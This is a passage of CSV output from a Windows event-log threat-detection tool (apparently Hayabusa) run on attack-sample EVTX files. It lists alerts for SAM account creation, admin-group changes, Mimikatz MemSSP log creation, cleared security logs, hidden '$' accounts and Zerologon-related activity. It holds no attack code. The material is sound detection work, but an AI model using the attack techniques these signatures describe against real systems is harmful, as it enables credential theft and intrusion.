Alert,Valid Account - Local Account Created or Deleted | DeleteKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 10:03:04.489 +00:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local 
Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 10:03:04.489 +00:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 10:33:31.843 +00:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\sqlsvc | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 10:33:31.843 +00:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\sqlsvc\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 10:45:30.650 +00:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid 
Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 10:45:33.802 +00:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 10:54:20.005 +00:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 10:54:20.005 +00:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | DeleteKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 10:54:22.974 
+00:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 10:54:22.974 +00:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 11:00:13.713 +00:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | DeleteKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 11:00:24.602 +00:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 
11:00:24.602 +00:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 11:02:16.084 +00:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-05 13:28:40.585 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 3004 -s 632 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | LID: 0x3e5 | PID: 3424 | PGUID: 747F3D96-9288-5F53-1902-00000000E500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-05 13:33:34.590 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 3668 -s 4420 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | LID: 0x3e5 | PID: 4688 | PGUID: 
747F3D96-93AE-5F53-3602-00000000E500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-05 13:34:11.983 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x4 /state0:0xa3cea855 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 6556 | PGUID: 747F3D96-93D3-5F53-3802-00000000E500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-05 13:37:07.245 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x2 /state0:0xa3bd2855 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 1008 | PGUID: 747F3D96-130C-5F54-1300-00000000E600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-09 13:18:23.627 +00:00,MSEDGEWIN10,4625,low,,Logon Failure - Wrong Password,User: IEUser | Type: 2 | Computer: MSEDGEWIN10 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx +2020-09-10 17:48:47.077 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 388 | PGUID: 747F3D96-66F7-5F5A-0500-00000000F600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx +2020-09-10 17:48:47.077 +00:00,MSEDGEWIN10,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent 
Processes,,rules/sigma/process_creation_sysmon/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx +2020-09-11 12:10:22.398 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\mimilsa.log | Process: C:\Windows\system32\lsass.exe | PID: 640 | PGUID: 747F3D96-672C-5F5B-0D00-00000000FC00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_Mimikatz_Memssp_Default_Logs_Sysmon_11.evtx +2020-09-11 12:10:22.398 +00:00,MSEDGEWIN10,11,critical,CredAccess,Mimikatz MemSSP Default Log File Creation,,rules/sigma/file_event/file_event_win_mimimaktz_memssp_log_file.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_Mimikatz_Memssp_Default_Logs_Sysmon_11.evtx +2020-09-14 14:44:04.878 +00:00,Sec504Student,1102,high,Evas,Security Log Cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx +2020-09-14 14:44:14.393 +00:00,Sec504Student,4674,medium,Persis,Possible Hidden Service Attempt,Svc: nginx | User: Sec504 | LID: 0x99e3d | AccessMask: %%1539,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx +2020-09-14 14:46:33.690 +00:00,Sec504Student,4674,medium,Persis,Possible Hidden Service Attempt,Svc: nginx | User: Sec504 | LID: 0x99e3d | AccessMask: %%1539,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx +2020-09-14 14:48:28.683 +00:00,Sec504Student,4674,medium,Persis,Possible Hidden Service Attempt,Svc: nginx | User: Sec504 | LID: 0x99e3d | AccessMask: 
%%1539,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx +2020-09-15 18:04:36.333 +00:00,MSEDGEWIN10,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx +2020-09-15 18:04:39.987 +00:00,MSEDGEWIN10,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: svc01 | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\inetsrv\w3wp.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx +2020-09-15 19:28:17.594 +00:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx +2020-09-15 19:28:31.453 +00:00,01566s-win16-ir.threebeesco.com,104,high,Evas,System Log File Cleared,User: a-jbrown,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_CVE-2020-1472_DFIR_System_NetLogon_Error_EventID_5805.evtx +2020-09-15 19:29:51.507 +00:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: 02694W-WIN10 | IP Addr: 172.16.66.37 | LID: 0x31ff6e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx +2020-09-15 19:29:51.517 +00:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: 
ANONYMOUS LOGON | Computer: 02694W-WIN10 | IP Addr: 172.16.66.37 | LID: 0x31ff89,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx +2020-09-16 09:31:19.133 +00:00,01566s-win16-ir.threebeesco.com,4720,high,Persis,Hidden User Account Created! (Possible Backdoor),User: $ | SID: S-1-5-21-308926384-506822093-3341789130-107103,rules/hayabusa/default/alerts/Security/4720_AccountCreated_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx +2020-09-16 09:31:19.133 +00:00,01566s-win16-ir.threebeesco.com,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx +2020-09-16 09:32:13.647 +00:00,01566s-win16-ir.threebeesco.com,4720,high,Persis,Hidden User Account Created! 
(Possible Backdoor),User: $ | SID: S-1-5-21-308926384-506822093-3341789130-107104,rules/hayabusa/default/alerts/Security/4720_AccountCreated_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx +2020-09-16 09:32:13.647 +00:00,01566s-win16-ir.threebeesco.com,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx +2020-09-17 10:57:37.013 +00:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx +2020-09-17 10:57:44.254 +00:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: 02694W-WIN10 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx +2020-09-17 10:57:44.270 +00:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: 02694W-WIN10 | IP Addr: 172.16.66.37 | LID: 0x853237,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx +2020-09-19 21:12:15.920 +00:00,01566s-win16-ir.threebeesco.com,12,medium,,Registry Key Create/Delete_Sysmon Alert,Machine Account Saved Password Set | CreateKey: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 
83989F29-0ADD-5F61-0B00-00000000FE00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx +2020-09-19 21:12:15.920 +00:00,01566s-win16-ir.threebeesco.com,13,medium,,Registry Key Value Set_Sysmon Alert,Machine Account Saved Password Set | SetValue: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal\(Default): Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx +2020-09-19 21:14:32.852 +00:00,01566s-win16-ir.threebeesco.com,12,medium,,Registry Key Create/Delete_Sysmon Alert,Machine Account Saved Password Set | CreateKey: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx +2020-09-19 21:14:32.852 +00:00,01566s-win16-ir.threebeesco.com,13,medium,,Registry Key Value Set_Sysmon Alert,Machine Account Saved Password Set | SetValue: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal\(Default): Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx +2020-09-20 21:22:24.799 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Local Admin Password Setting Changed | SetValue: 
HKLM\SAM\SAM\Domains\Account\Users\000001F4\ForcePasswordReset: Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 648 | PGUID: 747F3D96-C6C1-5F67-0000-0010A65D0000,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon_13_Local_Admin_Password_Changed.evtx +2020-09-23 16:49:26.469 +00:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:52246 (01566s-win16-ir.threebeesco.com) | Dst: 0:0:0:0:0:0:0:1:389 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe | PID: 1864 | PGUID: 83989F29-3391-5F6B-1F00-000000000301,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-23 16:49:41.578 +00:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-23 16:49:44.353 +00:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{DC4537C3-CA73-4AC7-9E1D-B2CE27C3A7A6} | Process: C:\Windows\System32\dllhost.exe | User: 3B\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x7b186 | PID: 3276 | PGUID: 83989F29-7CA8-5F6B-1201-000000000301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-23 16:49:44.380 +00:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{49F6E667-6658-4BD1-9DE9-6AF87F9FAF85} | Process: C:\Windows\System32\dllhost.exe | User: 3B\Administrator | Parent Cmd: 
C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x7b186 | PID: 7096 | PGUID: 83989F29-7CA8-5F6B-1301-000000000301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-23 16:50:16.697 +00:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-23 16:50:16.697 +00:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: - | IP Addr: 172.16.66.37 | LID: 0x1136e95,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-23 16:50:16.702 +00:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-23 16:50:16.703 +00:00,01566s-win16-ir.threebeesco.com,18,medium,,Pipe Connected_Sysmon Alert,PrivEsc - Rogue Spool named pipe | Pipe: \eventlog | Process: System | PID: 4 | PGUID: 83989F29-3374-5F6B-0100-000000000301,rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-23 16:50:16.892 +00:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 5424 -s 4616 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted | LID: 0x3e5 | PID: 
6868 | PGUID: 83989F29-7CC8-5F6B-2101-000000000301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-23 16:50:17.194 +00:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-23 16:50:17.194 +00:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: - | IP Addr: 172.16.66.37 | LID: 0x1137987,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-23 16:50:17.200 +00:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-23 16:50:18.302 +00:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.37:50106 (-) | Dst: 172.16.66.36:445 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 83989F29-3374-5F6B-0100-000000000301,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-23 16:50:18.302 +00:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.37:50107 (-) | Dst: 172.16.66.36:445 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 
